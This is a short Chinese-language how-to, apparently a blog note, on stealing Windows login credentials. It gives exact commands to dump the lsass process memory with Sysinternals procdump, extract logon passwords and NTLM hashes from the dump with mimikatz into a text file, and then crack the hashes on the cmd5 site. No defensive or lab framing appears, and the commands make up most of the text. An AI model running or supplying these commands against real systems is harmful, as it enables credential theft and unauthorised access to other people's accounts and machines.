1、先下载两个工具
procdump是微软官方Sysinternals工具合集中的(https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump)
mimikatz开源项目地址(https://github.com/gentilkiwi/mimikatz)文件地址(https://github.com/gentilkiwi/mimikatz/releases)
2、用管理员权限打开cmd,进入procdump命令目录下执行下面命令会保存lsass进程数据到当前下的lsass.dmp文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3、同样管理员权限进行mimikatz命令目录下执行下面命令会将记录输出到当前下的password.txt文件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit>>password.txt
4、NTLM后的密文拿到cmd5上就可以破解
参考:
